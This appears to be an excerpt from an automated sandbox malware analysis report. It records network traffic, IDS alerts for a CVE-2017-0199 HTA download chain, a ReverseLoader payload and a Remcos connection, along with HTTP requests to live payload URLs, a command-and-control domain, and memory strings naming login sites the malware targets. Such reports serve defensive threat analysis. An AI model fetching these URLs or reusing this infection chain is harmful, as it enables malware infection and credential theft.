                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: global trafficTCP traffic: 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: global trafficTCP traffic: 172.234.205.135:80 -> 192.168.2.22:49162

                  Networking

                  Source: Network traffic, Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.234.205.135:80 -> 192.168.2.22:49164
                  Source: Network traffic, Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.234.205.135:80 -> 192.168.2.22:49162
                  Source: Network traffic, Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49165 -> 172.234.205.135:80
                  Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 31.13.224.72:2412
                  Source: Network traffic, Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 31.13.224.72:2412
                  Source: Network traffic, Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.234.205.135:80 -> 192.168.2.22:49173
                  Source: Network traffic, Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.234.205.135:80 -> 192.168.2.22:49173
                  Source: Network traffic, Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.234.205.135:80 -> 192.168.2.22:49177
                  Source: Network traffic, Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.234.205.135:80 -> 192.168.2.22:49177
                  Source: Network traffic, Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.234.205.135:80 -> 192.168.2.22:49177
                  Source: Network traffic, Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.234.205.135:80 -> 192.168.2.22:49177
                  Source: Network traffic, Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.234.205.135:80 -> 192.168.2.22:49173
                  Source: Network traffic, Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.234.205.135:80 -> 192.168.2.22:49173
                  Source: Network traffic, Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.205:443 -> 192.168.2.22:49168
                  Source: Network traffic, Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.205:443 -> 192.168.2.22:49172
                  Source: Malware configuration extractor, URLs: newbeggin.duckdns.org
                  Source: unknown, DNS query: name: newbeggin.duckdns.org
                  Source: global traffic, TCP traffic: 192.168.2.22:49174 -> 31.13.224.72:2412
                  Source: global traffic, HTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1 Host: 3105.filemail.com Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1244/SRVRSR.txt HTTP/1.1Host: 172.234.205.135Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 198.244.140.41 198.244.140.41
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox ViewASN Name: SARNICA-ASBG SARNICA-ASBG
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49171 -> 172.234.205.135:80
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 172.234.205.135:80
                  Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 172.234.205.135:80
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /OAffUi?&chairlift=busy&cockpit=blushing&precipitation=honorable&skill=quizzical&timeout HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: provit.ukConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.234.205.135Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 172.234.205.135If-Range: "1e074-627bb40d70f1b"
                  Source: global trafficHTTP traffic detected: GET /1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.234.205.135Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Mon, 25 Nov 2024 11:44:20 GMTConnection: Keep-AliveHost: 172.234.205.135If-None-Match: "1e074-627bb40d70f1b"
                  Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49168 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 172.234.205.135
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_000007FE899C4B18 URLDownloadToFileW,5_2_000007FE899C4B18
                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9E11CDD8.emfJump to behavior
                  Source: bhvD598.tmp.30.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exe, CasPol.exe, 00000021.00000002.530176368.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: CasPol.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001E.00000002.532205539.000000000011E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001E.00000002.532205539.000000000011E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: bhvD598.tmp.30.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: CasPol.exe, 0000001E.00000002.533158052.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: provit.uk
                  Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
                  Source: global trafficDNS traffic detected: DNS query: newbeggin.duckdns.org
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: mshta.exe, 00000004.00000003.427140274.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429534936.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479530310.00000000033A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/
                  Source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/crea
                  Source: powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF
                  Source: powershell.exe, 00000012.00000002.490397083.000000001AD05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF.dll
                  Source: powershell.exe, 00000005.00000002.453548568.000000001A907000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIF.dlli2h
                  Source: powershell.exe, 00000005.00000002.454661113.000000001C25F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.493454203.000000001C1C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIFC:
                  Source: powershell.exe, 00000005.00000002.448423237.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/creatgoodideaforfuturebusinessdevelopwithnicethingsgetbackon.tIFp
                  Source: mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta
                  Source: mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta...
                  Source: mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta...?L5.
                  Source: mshta.exe, 00000004.00000002.428662532.0000000000147000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.428612562.0000000000147000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.425003533.0000000000154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.hta.NET4.0E)
                  Source: mshta.exe, 00000004.00000003.427140274.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.429534936.0000000003C5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.0000000003405000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaC:
                  Source: mshta.exe, 00000004.00000002.429003088.0000000003BE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htae
                  Source: mshta.exe, 00000004.00000003.427071781.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427222699.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.476827470.0000000002E85000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.472367712.0000000002E85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htahttp://172.234.205
                  Source: mshta.exe, 00000004.00000003.425003533.0000000000111000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htakill=qu
                  Source: mshta.exe, 00000004.00000002.428662532.00000000000FF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.000000000040D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.00000000003BE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479236959.000000000040E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.000000000040E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htakill=quizzical&tim
                  Source: mshta.exe, 00000004.00000002.429003088.0000000003BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htan
                  Source: mshta.exe, 00000010.00000002.479236959.0000000000422000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478821092.0000000000422000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htao
                  Source: mshta.exe, 00000004.00000003.425003533.0000000000154000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470316300.0000000000435000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/1244/secs/nicewithgoodthingswhichgosofargoodforeerybody.htaout
                  Source: mshta.exe, 00000010.00000002.479530310.00000000033A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.205.135/o-5.
                  Source: mshta.exe, 00000004.00000002.429534936.0000000003C1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.427140274.0000000003C1E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.478850860.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.470419900.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.473015437.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000002.479560471.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000010.00000003.467588061.00000000033BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: CasPol.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: CasPol.exe, 00000023.00000002.542292669.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: powershell.exe, 00000005.00000002.448423237.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.486539543.00000000022FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvD598.tmp.30.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
